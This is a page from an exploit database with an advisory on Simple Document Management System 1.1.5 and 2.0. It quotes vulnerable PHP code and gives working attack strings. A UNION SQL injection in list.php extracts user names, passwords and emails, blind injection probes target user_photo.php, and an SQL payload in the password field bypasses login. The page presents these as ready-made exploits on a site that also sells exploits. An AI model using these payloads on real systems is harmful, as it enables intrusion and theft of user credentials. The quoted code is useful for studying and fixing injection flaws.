0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simple Document Management System 1.1.5 / 2.0 SQL Injection Vulnerability
Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities bug found by Jose Luis Gongora Fernandez (a.k.a) JosS twitter: @JossGongora contact: sys-project[at]hotmail[dot]com website: http://www.hack0wn.com/ download: http://mirror.us.cc.com.au/pub/cafuego/sdms ----------- version 2.0 ----------- ~~ [Multiple SQL] /list.php?folder_id=['foo] /detail.php?doc_id=['foo] <code> line 13: if(isset($_GET['folder_id'])) $folder_id = $_GET['folder_id']; ... line 48: if(isset($order)) { $query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order); } else { $query = "SELECT id,name FROM folders WHERE parent=$folder_id"; } </code> .xpl! :: /list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users-- ~~ [Blind] /user_photo.php?view=[foo] <code> $query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view']; $res = mysql_query($query, $sql); if( mysql_num_rows($res) == 1 ) { $row = mysql_fetch_array($res); header( "Content-type: $row[mime]" ); echo "". base64_decode($row[photo]) .""; } else { echo "Badness!\n"; } </code> .poc! :: /user_photo.php?view=2+and+1=1 /user_photo.php?view=2+and+1=2 ------------- version 1.1.5 ------------- ~~ [Auth Bypass] /login.php <code> $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); if( $row[0] != 0 ) { header("Location: index.php"); exit; } $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); $id = $row[id]; $name = $row[name]; </code> .xpl! :: user: Admin password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- __h0__ # 0day.today [2024-07-05] #